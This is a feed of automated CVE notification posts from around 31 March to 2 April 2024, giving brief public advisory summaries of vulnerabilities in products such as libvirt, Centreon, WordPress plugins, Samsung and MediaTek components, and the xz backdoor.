🚨 CVE-2024-20844Out-of-bounds write vulnerability while parsing remaining codewords in libsavsac.so prior to SMR Apr-2024 Release 1 allows local attacker to execute arbitrary code.🎖@cveNotify |
|
| 2024-04-02 03:37:32 |
🚨 CVE-2024-20842Improper Input Validation vulnerability in handling apdu of libsec-ril prior to SMR Apr-2024 Release 1 allows local privileged attackers to write out-of-bounds memory.🎖@cveNotify |
|
| 2024-04-02 03:37:31 |
🚨 CVE-2024-26651In the Linux kernel, the following vulnerability has been resolved:sr9800: Add check for usbnet_get_endpointsAdd check for usbnet_get_endpoints() and return the error if it failsin order to transfer the error.🎖@cveNotify |
|
| 2024-04-02 03:37:27 |
🚨 CVE-2024-23284A logic issue was addressed with improved state management. This issue is fixed in tvOS 17.4, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, Safari 17.4. Processing maliciously crafted web content may prevent Content Security Policy from being enforced.🎖@cveNotify |
|
| 2024-04-02 03:37:26 |
🚨 CVE-2022-31630In PHP versions prior to 7.4.33, 8.0.25 and 8.1.12, when using imageloadfont() function in gd extension, it is possible to supply a specially crafted font file, such as if the loaded font is used with imagechar() function, the read outside allocated buffer will be used. This can lead to crashes or disclosure of confidential information.🎖@cveNotify |
|
| 2024-04-02 02:37:25 |
🚨 CVE-2024-3146A vulnerability classified as problematic has been found in DedeCMS 5.7. This affects an unknown part of the file /src/dede/makehtml_rss_action.php. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-258921 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-02 02:37:24 |
🚨 CVE-2024-3144A vulnerability was found in DedeCMS 5.7. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /src/dede/makehtml_spec.php. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258919. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-02 01:37:32 |
🚨 CVE-2024-20820Improper input validation in bootloader prior to SMR Feb-2024 Release 1 allows local privileged attackers to cause an Out-Of-Bounds read.🎖@cveNotify |
|
| 2024-04-02 01:37:26 |
🚨 CVE-2024-20814Out-of-bounds Read in padmd_vld_ac_prog_refine of libpadm.so prior to SMR Feb-2024 Release 1 allows local attackers access unauthorized information.🎖@cveNotify |
|
| 2024-04-02 01:37:25 |
🚨 CVE-2024-20805Path traversal vulnerability in ZipCompressor of MyFiles prior to SMR Jan-2024 Release 1 in Android 11 and Android 12, and version 14.5.00.21 in Android 13 allows local attackers to write arbitrary file.🎖@cveNotify |
|
| 2024-04-02 01:37:24 |
🚨 CVE-2024-20804Path traversal vulnerability in FileUriConverter of MyFiles prior to SMR Jan-2024 Release 1 in Android 11 and Android 12, and version 14.5.00.21 in Android 13 allows local attackers to write arbitrary file.🎖@cveNotify |
|
| 2024-04-02 00:37:31 |
🚨 CVE-2024-27334Kofax Power PDF JPG File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Kofax Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of JPG files.The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-21978.🎖@cveNotify |
|
| 2024-04-01 23:37:25 |
🚨 CVE-2024-3139A vulnerability, which was classified as critical, has been found in SourceCodester Computer Laboratory Management System 1.0. Affected by this issue is the function save_users of the file /classes/Users.php?f=save. The manipulation of the argument id leads to improper authorization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-258914 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-01 23:37:24 |
🚨 CVE-2024-27333Kofax Power PDF GIF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Kofax Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of GIF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-21976.🎖@cveNotify |
|
| 2024-04-01 22:37:38 |
🚨 CVE-2024-23118Centreon updateContactHostCommands SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Centreon. Authentication is required to exploit this vulnerability.The specific flaw exists within the updateContactHostCommands function. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-22298.🎖@cveNotify |
|
| 2024-04-01 22:37:31 |
🚨 CVE-2024-23116Centreon updateLCARelation SQL Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Centreon. Authentication is required to exploit this vulnerability.The specific flaw exists within the updateLCARelation function. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-22296.🎖@cveNotify |
|
| 2024-04-01 22:37:30 |
🚨 CVE-2024-1179TP-Link Omada ER605 DHCPv6 Client Options Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of TP-Link Omada ER605 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of DHCP options. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-22420.🎖@cveNotify |
|
| 2024-04-01 22:37:26 |
🚨 CVE-2023-51573Voltronic Power ViewPower Pro updateManagerPassword Exposed Dangerous Function Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Voltronic Power ViewPower Pro. Authentication is not required to exploit this vulnerability.The specific flaw exists within the updateManagerPassword function. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-21203.🎖@cveNotify |
|
| 2024-04-01 22:37:25 |
🚨 CVE-2023-51571Voltronic Power ViewPower Pro SocketService Missing Authentication Denial-of-Service Vulnerability. This vulnerability allows remote attackers to create a denial-of-service condition on affected installations of Voltronic Power ViewPower Pro. Authentication is not required to exploit this vulnerability.The specific flaw exists within the SocketService module, which listens on UDP port 41222 by default. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to create a denial-of-service condition on the system. Was ZDI-CAN-21162.🎖@cveNotify |
|
| 2024-04-01 22:37:24 |
🚨 CVE-2023-51570Voltronic Power ViewPower Pro Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Voltronic Power ViewPower Pro. Authentication is not required to exploit this vulnerability.The specific flaw exists within the RMI interface, which listens on TCP port 41009 by default. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-21012.🎖@cveNotify |
|
| 2024-04-01 21:37:24 |
🚨 CVE-2024-28734Cross Site Scripting vulnerability in Unit4 Financials by Coda prior to 2023Q4 allows a remote attacker to run arbitrary code via a crafted GET request using the cols parameter.🎖@cveNotify |
|
| 2024-04-01 20:37:25 |
🚨 CVE-2024-29433A deserialization vulnerability in the FASTJSON component of Alldata v0.4.6 allows attackers to execute arbitrary commands via supplying crafted data.🎖@cveNotify |
|
| 2024-04-01 20:37:24 |
🚨 CVE-2023-48906Stack Overflow vulnerability in Btstack 1.6 and earlier allows attackers to cause a denial of service via crafted input to the char_for_nibble function.🎖@cveNotify |
|
| 2024-04-01 19:37:24 |
🚨 CVE-2024-3135The web server lacked CSRF tokens allowing an attacker to host malicious JavaScript on a host that when visited by a LocalAI user, could allow the attacker to fill disk space to deny service or abuse credits.🎖@cveNotify |
|
| 2024-04-01 18:37:24 |
🚨 CVE-2024-3094Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.🎖@cveNotify |
|
| 2024-04-01 17:37:25 |
🚨 CVE-2024-3131A vulnerability was found in SourceCodester Computer Laboratory Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /classes/Master.php?f=save_category. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-258874 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-01 17:37:24 |
🚨 CVE-2024-3094Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.🎖@cveNotify |
|
| 2024-04-01 16:37:32 |
🚨 CVE-2024-30862netentsec NS-ASG 6.3 is vulnerable to SQL Injection via /3g/index.php.🎖@cveNotify |
|
| 2024-04-01 16:37:26 |
🚨 CVE-2024-30861netentsec NS-ASG 6.3 is vulnerable to SQL Injection via /admin/configguide/ipsec_guide_1.php.🎖@cveNotify |
|
| 2024-04-01 16:37:25 |
🚨 CVE-2024-30858netentsec NS-ASG 6.3 is vulnerable to SQL Injection via /admin/edit_fire_wall.php.🎖@cveNotify |
|
| 2024-04-01 16:37:24 |
🚨 CVE-2024-25574SQL injection vulnerability exists in GetDIAE_usListParameters.🎖@cveNotify |
|
| 2024-04-01 16:07:32 |
🚨 CVE-2023-33959notation is a CLI tool to sign and verify OCI artifacts and container images. An attacker who has compromised a registry can cause users to verify the wrong artifact. The problem has been fixed in the release v1.0.0-rc.6. Users should upgrade their notation-go library to v1.0.0-rc.6 or above. Users unable to upgrade may restrict container registries to a set of secure and trusted container registries.🎖@cveNotify |
|
| 2024-04-01 16:07:31 |
🚨 CVE-2023-1370[Json-smart](https://netplex.github.io/json-smart/) is a performance focused, JSON processor lib.When reaching a ‘[‘ or ‘{‘ character in the JSON input, the code parses an array or an object respectively.It was discovered that the code does not have any limit to the nesting of such arrays or objects. Since the parsing of nested arrays and objects is done recursively, nesting too many of them can cause a stack exhaustion (stack overflow) and crash the software.🎖@cveNotify |
|
| 2024-04-01 16:07:30 |
🚨 CVE-2023-1017An out-of-bounds write vulnerability exists in TPM2.0's Module Library allowing writing of a 2-byte data past the end of TPM2.0 command in the CryptParameterDecryption routine. An attacker who can successfully exploit this vulnerability can lead to denial of service (crashing the TPM chip/process or rendering it unusable) and/or arbitrary code execution in the TPM context.🎖@cveNotify |
|
| 2024-04-01 16:07:26 |
🚨 CVE-2017-8806The Debian pg_ctlcluster, pg_createcluster, and pg_upgradecluster scripts, as distributed in the Debian postgresql-common package before 181+deb9u1 for PostgreSQL (and other packages related to Debian and Ubuntu), handled symbolic links insecurely, which could result in local denial of service by overwriting arbitrary files.🎖@cveNotify |
|
| 2024-04-01 16:07:25 |
🚨 CVE-2013-5788Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java SE Embedded 7u40 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.🎖@cveNotify |
|
| 2024-04-01 15:37:42 |
🚨 CVE-2023-33099Transient DOS while processing SMS container of non-standard size received in DL NAS transport in NR.🎖@cveNotify |
|
| 2024-04-01 15:37:41 |
🚨 CVE-2023-46808An file upload vulnerability in Ivanti ITSM before 2023.4, allows an authenticated remote user to perform file writes to the server. Successful exploitation may lead to execution of commands in the context of non-root user.🎖@cveNotify |
|
| 2024-04-01 15:37:40 |
🚨 CVE-2023-41724A command injection vulnerability in Ivanti Sentry prior to 9.19.0 allows unauthenticated threat actor to execute arbitrary commands on the underlying operating system of the appliance within the same physical or logical network.🎖@cveNotify |
|
| 2024-04-01 14:37:25 |
🚨 CVE-2024-3125A vulnerability classified as problematic was found in Zebra ZTC GK420d 1.0. This vulnerability affects unknown code of the file /settings of the component Alert Setup Page. The manipulation of the argument Address leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258868. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-01 14:37:24 |
🚨 CVE-2024-31099Missing Authorization vulnerability in Averta Shortcodes and extra features for Phlox theme.This issue affects Shortcodes and extra features for Phlox theme: from n/a through 2.15.5.🎖@cveNotify |
|
| 2024-04-01 13:37:41 |
🚨 CVE-2024-3124A vulnerability classified as problematic has been found in fridgecow smartalarm 1.8.1 on Android. This affects an unknown part of the file androidmanifest.xml of the component Backup File Handler. The manipulation leads to exposure of backup file to an unauthorized control sphere. It is possible to launch the attack on the physical device. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258867.🎖@cveNotify |
|
| 2024-04-01 13:37:37 |
🚨 CVE-2024-30870netentsec NS-ASG 6.3 is vulnerable to SQL Injection via /admin/address_interpret.php.🎖@cveNotify |
|
| 2024-04-01 13:37:36 |
🚨 CVE-2024-2494A flaw was found in the RPC library APIs of libvirt. The RPC server deserialization code allocates memory for arrays before the non-negative length check is performed by the C API entry points. Passing a negative length to the g_new0 function results in a crash due to the negative length being treated as a huge positive number. This flaw allows a local, unprivileged user to perform a denial of service attack by causing the libvirt daemon to crash.🎖@cveNotify |
|
| 2024-04-01 13:37:31 |
🚨 CVE-2024-1441An off-by-one error flaw was found in the udevListInterfacesByStatus() function in libvirt when the number of interfaces exceeds the size of the `names` array. This issue can be reproduced by sending specially crafted data to the libvirt daemon, allowing an unprivileged client to perform a denial of service attack by causing the libvirt daemon to crash.🎖@cveNotify |
|
| 2024-04-01 13:37:30 |
🚨 CVE-2021-4147A flaw was found in the libvirt libxl driver. A malicious guest could continuously reboot itself and cause libvirtd on the host to deadlock or crash, resulting in a denial of service condition.🎖@cveNotify |
|
| 2024-04-01 13:37:26 |
🚨 CVE-2021-3631A flaw was found in libvirt while it generates SELinux MCS category pairs for VMs' dynamic labels. This flaw allows one exploited guest to access files labeled for another guest, resulting in the breaking out of sVirt confinement. The highest threat from this vulnerability is to confidentiality and integrity.🎖@cveNotify |
|
| 2024-04-01 13:37:25 |
🚨 CVE-2020-10703A NULL pointer dereference was found in the libvirt API responsible introduced in upstream version 3.10.0, and fixed in libvirt 6.0.0, for fetching a storage pool based on its target path. In more detail, this flaw affects storage pools created without a target path such as network-based pools like gluster and RBD. Unprivileged users with a read-only connection could abuse this flaw to crash the libvirt daemon, resulting in a potential denial of service.🎖@cveNotify |
|
| 2024-04-01 13:37:24 |
🚨 CVE-2020-12430An issue was discovered in qemuDomainGetStatsIOThread in qemu/qemu_driver.c in libvirt 4.10.0 though 6.x before 6.1.0. A memory leak was found in the virDomainListGetStats libvirt API that is responsible for retrieving domain statistics when managing QEMU guests. This flaw allows unprivileged users with a read-only connection to cause a memory leak in the domstats command, resulting in a potential denial of service.🎖@cveNotify |
|
| 2024-04-01 13:07:44 |
🚨 CVE-2024-2262Themify WordPress plugin before 1.4.4 does not have CSRF check in its bulk action, which could allow attackers to make logged in users delete arbitrary filters via CSRF attack, granted they know the related filter slugs🎖@cveNotify |
|
| 2024-04-01 13:07:43 |
🚨 CVE-2024-20055In imgsys, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is needed for exploitation Patch ID: ALPS08518692; Issue ID: MSV-1012.🎖@cveNotify |
|
| 2024-04-01 13:07:42 |
🚨 CVE-2024-20054In gnss, there is a possible escalation of privilege due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08580200; Issue ID: ALPS08580200.🎖@cveNotify |
|
| 2024-04-01 12:37:24 |
🚨 CVE-2022-4966A vulnerability was found in sequentech admin-console up to 6.1.7 and classified as problematic. Affected by this issue is some unknown functionality of the component Election Description Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 7.0.0-beta.1 is able to address this issue. The patch is identified as 0043a6b1e6e0f5abc9557e73f9ffc524fc5d609d. It is recommended to upgrade the affected component. VDB-258782 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-01 11:37:24 |
🚨 CVE-2023-6154A configuration setting issue in seccenter.exe as used in Bitdefender Total Security, Bitdefender Internet Security, Bitdefender Antivirus Plus, Bitdefender Antivirus Free allows an attacker to change the product's expected behavior and potentially load a third-party library upon execution. This issue affects Total Security: 27.0.25.114; Internet Security: 27.0.25.114; Antivirus Plus: 27.0.25.114; Antivirus Free: 27.0.25.114.🎖@cveNotify |
|
| 2024-04-01 10:37:25 |
🚨 CVE-2024-3130Hard-coded Credentials in CoolKit eWeLlink app are before 5.4.x on Android and IOS allows local attacker to unauthorized access to sensitive data via Decryption algorithm and key obtained after decompiling app🎖@cveNotify |
|
| 2024-04-01 09:37:25 |
🚨 CVE-2024-26653In the Linux kernel, the following vulnerability has been resolved:usb: misc: ljca: Fix double free in error handling pathWhen auxiliary_device_add() returns error and then callsauxiliary_device_uninit(), callback function ljca_auxdev_releasecalls kfree(auxdev->dev.platform_data) to free the parameter dataof the function ljca_new_client_device. The callers ofljca_new_client_device shouldn't call kfree() againin the error handling path to free the platform data.Fix this by cleaning up the redundant kfree() in all callers andadding kfree() the passed in platform_data on errors which happenbefore auxiliary_device_init() succeeds .🎖@cveNotify |
|
| 2024-04-01 09:37:24 |
🚨 CVE-2024-25080WebMail in Axigen 10.x before 10.3.3.62 allows XSS via the image attachment viewer.🎖@cveNotify |
|
| 2024-04-01 07:37:26 |
🚨 CVE-2024-0944A vulnerability was found in Totolink T8 4.1.5cu.833_20220905. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /cgi-bin/cstecgi.cgi. The manipulation leads to session expiration. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252188. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-01 07:37:25 |
🚨 CVE-2024-0570A vulnerability classified as critical was found in Totolink N350RT 9.3.5u.6265. This vulnerability affects unknown code of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. It is recommended to upgrade the affected component. VDB-250786 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-01 07:37:24 |
🚨 CVE-2024-0569A vulnerability classified as problematic has been found in Totolink T8 4.1.5cu.833_20220905. This affects the function getSysStatusCfg of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation of the argument ssid/key leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.5cu.862_B20230228 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-250785 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-04-01 06:37:26 |
🚨 CVE-2016-15038A vulnerability, which was classified as critical, was found in NUUO NVRmini 2 up to 3.0.8. Affected is an unknown function of the file /deletefile.php. The manipulation of the argument filename leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258780.🎖@cveNotify |
|
| 2024-04-01 05:37:25 |
🚨 CVE-2024-2262Themify WordPress plugin before 1.4.4 does not have CSRF check in its bulk action, which could allow attackers to make logged in users delete arbitrary filters via CSRF attack, granted they know the related filter slugs🎖@cveNotify |
|
| 2024-04-01 05:37:24 |
🚨 CVE-2024-3094Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.🎖@cveNotify |
|
| 2024-04-01 04:37:35 |
🚨 CVE-2024-24399An arbitrary file upload vulnerability in LEPTON v7.0.0 allows authenticated attackers to execute arbitrary PHP code by uploading this code to the backend/languages/index.php languages area.🎖@cveNotify |
|
| 2024-04-01 03:37:32 |
🚨 CVE-2024-20043In da, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541781; Issue ID: ALPS08541781.🎖@cveNotify |
|
| 2024-04-01 03:37:25 |
🚨 CVE-2024-20040In wlan firmware, there is a possible out of bounds write due to improper input validation. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08360153 (for MT6XXX chipsets) / WCNCR00363530 (for MT79XX chipsets); Issue ID: MSV-979.🎖@cveNotify |
|
| 2024-04-01 03:37:24 |
🚨 CVE-2023-32890In modem EMM, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01183647; Issue ID: MOLY01183647 (MSV-963).🎖@cveNotify |
|
| 2024-04-01 02:37:32 |
🚨 CVE-2024-31033JJWT (aka Java JWT) through 0.12.5 ignores certain characters and thus a user might falsely conclude that they have a strong key. The impacted code is the setSigningKey() method within the DefaultJwtParser class and the signWith() method within the DefaultJwtBuilder class.🎖@cveNotify |
|
| 2024-04-01 02:37:31 |
🚨 CVE-2024-29686Server-side Template Injection (SSTI) vulnerability in Winter CMS v.1.2.3 allows a remote attacker to execute arbitrary code via a crafted payload to the CMS Pages field and Plugin components. NOTE: the vendor disputes this because the payload could only be entered by a trusted user, such as the owner of the server that hosts Winter CMS, or a developer working for them.🎖@cveNotify |
|
| 2024-04-01 01:37:44 |
🚨 CVE-2024-30498Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CRM Perks CRM Perks Forms.This issue affects CRM Perks Forms: from n/a through 1.1.4.🎖@cveNotify |
|
| 2024-04-01 01:37:43 |
🚨 CVE-2024-30496Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in BdThemes Element Pack Elementor Addons.This issue affects Element Pack Elementor Addons: from n/a through 5.5.3.🎖@cveNotify |
|
| 2024-04-01 01:37:42 |
🚨 CVE-2024-30494Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ?? OSS Aliyun.This issue affects OSS Aliyun: from n/a through 1.4.10.🎖@cveNotify |
|
| 2024-04-01 01:37:38 |
🚨 CVE-2024-30491Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Metagauss ProfileGrid.This issue affects ProfileGrid : from n/a through 5.7.8.🎖@cveNotify |
|
| 2024-04-01 01:37:37 |
🚨 CVE-2024-30487Missing Authorization vulnerability in Sonaar Music MP3 Audio Player for Music, Radio & Podcast by Sonaar.This issue affects MP3 Audio Player for Music, Radio & Podcast by Sonaar: from n/a through 5.1.🎖@cveNotify |
|
| 2024-04-01 01:37:32 |
🚨 CVE-2024-30486Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Max Foundry Media Library Folders.This issue affects Media Library Folders: from n/a through 8.1.7.🎖@cveNotify |
|
| 2024-04-01 01:37:31 |
🚨 CVE-2024-30428Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Contest Gallery allows Reflected XSS.This issue affects Contest Gallery: from n/a through 21.3.5.🎖@cveNotify |
|
| 2024-04-01 01:37:26 |
🚨 CVE-2024-30426Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HashThemes Hash Elements allows Stored XSS.This issue affects Hash Elements: from n/a through 1.3.3.🎖@cveNotify |
|
| 2024-04-01 01:37:25 |
🚨 CVE-2022-47153Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPJobBoard Jobeleon Theme allows Reflected XSS.This issue affects Jobeleon Theme: from n/a through 1.9.1.🎖@cveNotify |
|
| 2024-04-01 00:37:36 |
🚨 CVE-2013-4407HTTP::Body::Multipart in the HTTP-Body 1.08, 1.17, and earlier module for Perl uses the part of the uploaded file's name after the first "." character as the suffix of a temporary file, which makes it easier for remote attackers to conduct attacks by leveraging subsequent behavior that may assume the suffix is well-formed.🎖@cveNotify |
|
| 2024-03-31 20:37:32 |
🚨 CVE-2024-30551Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Toast Plugins Sticky Anything.This issue affects Sticky Anything: from n/a through 2.1.5.🎖@cveNotify |
|
| 2024-03-31 20:37:26 |
🚨 CVE-2024-30550Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpdevart Responsive Image Gallery, Gallery Album allows Reflected XSS.This issue affects Responsive Image Gallery, Gallery Album: from n/a through 2.0.3.🎖@cveNotify |
|
| 2024-03-31 20:37:25 |
🚨 CVE-2024-30530Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sonaar Music MP3 Audio Player for Music, Radio & Podcast by Sonaar allows Stored XSS.This issue affects MP3 Audio Player for Music, Radio & Podcast by Sonaar: from n/a through 5.1.🎖@cveNotify |
|
| 2024-03-31 20:37:24 |
🚨 CVE-2024-30524Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RedLettuce Plugins PDF Viewer for Elementor allows Stored XSS.This issue affects PDF Viewer for Elementor: from n/a through 2.9.3.🎖@cveNotify |
|
| 2024-03-31 19:37:32 |
🚨 CVE-2024-30536Cross-Site Request Forgery (CSRF) vulnerability in WPFactory Slugs Manager.This issue affects Slugs Manager: from n/a through 2.6.7.🎖@cveNotify |
|
| 2024-03-31 19:37:25 |
🚨 CVE-2024-30523Insertion of Sensitive Information into Log File vulnerability in Paid Memberships Pro Paid Memberships Pro – Mailchimp Add On pmpro-mailchimp.This issue affects Paid Memberships Pro – Mailchimp Add On: from n/a through 2.3.4.🎖@cveNotify |
|
| 2024-03-31 19:37:24 |
🚨 CVE-2024-30489Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in loopus WP Cost Estimation & Payment Forms Builder.This issue affects WP Cost Estimation & Payment Forms Builder: from n/a through 10.1.75.🎖@cveNotify |
|
| 2024-03-31 18:37:25 |
🚨 CVE-2024-31115Unrestricted Upload of File with Dangerous Type vulnerability in QuanticaLabs Chauffeur Taxi Booking System for WordPress.This issue affects Chauffeur Taxi Booking System for WordPress: from n/a through 6.9.🎖@cveNotify |
|
| 2024-03-31 18:37:24 |
🚨 CVE-2024-31094Deserialization of Untrusted Data vulnerability in Filter Custom Fields & Taxonomies Light.This issue affects Filter Custom Fields & Taxonomies Light: from n/a through 1.05.🎖@cveNotify |
|
| 2024-03-31 12:37:26 |
🚨 CVE-2024-25027IBM Security Verify Access 10.0.6 could disclose sensitive snapshot information due to missing encryption. IBM X-Force ID: 281607.🎖@cveNotify |
|
| 2024-03-31 12:37:25 |
🚨 CVE-2023-50959IBM Cloud Pak for Business Automation 18.0.0, 18.0.1, 18.0.2,19.0.1, 19.0.2, 19.0.3,20.0.1, 20.0.2, 20.0.3, 21.0.1, 21.0.2, 21.0.3, 22.0.1,2 2.0.2, 23.0.1, and 23.0.2 may allow end users to query more documents than expected from a connected Enterprise Content Management system when configured to use a system account. IBM X-Force ID: 275938.🎖@cveNotify |
|
| 2024-03-31 12:37:24 |
🚨 CVE-2023-50311IBM CICS Transaction Gateway for Multiplatforms 9.2 and 9.3 transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. IBM X-Force ID: 273612.🎖@cveNotify |
|
| 2024-03-31 09:37:24 |
🚨 CVE-2017-20191A vulnerability was found in Zimbra zm-admin-ajax up to 8.8.1. It has been classified as problematic. This affects the function XFormItem.prototype.setError of the file WebRoot/js/ajax/dwt/xforms/XFormItem.js of the component Form Textbox Field Error Handler. The manipulation of the argument message leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 8.8.2 is able to address this issue. The identifier of the patch is bb240ce0c71c01caabaa43eed30c78ba8d7d3591. It is recommended to upgrade the affected component. The identifier VDB-258621 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-03-31 06:37:24 |
🚨 CVE-2015-10131A vulnerability was found in chrisy TFO Graphviz Plugin up to 1.9 on WordPress and classified as problematic. Affected by this issue is the function admin_page_load/admin_page of the file tfo-graphviz-admin.php. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.10 is able to address this issue. The name of the patch is 594c953a345f79e26003772093b0caafc14b92c2. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-258620.🎖@cveNotify |
|
| 2024-03-31 05:37:24 |
🚨 CVE-2024-3118A vulnerability, which was classified as critical, has been found in Dreamer CMS up to 4.1.3. This issue affects some unknown processing of the component Attachment Handler. The manipulation leads to permission issues. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-258779. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-03-31 03:37:25 |
🚨 CVE-2024-28180Package jose aims to provide an implementation of the Javascript Object Signing and Encryption set of standards. An attacker could send a JWE containing compressed data that used large amounts of memory and CPU when decompressed by Decrypt or DecryptMulti. Those functions now return an error if the decompressed data would exceed 250kB or 10x the compressed size (whichever is larger). This vulnerability has been patched in versions 4.0.1, 3.0.3 and 2.6.3.🎖@cveNotify |
|
| 2024-03-31 03:37:24 |
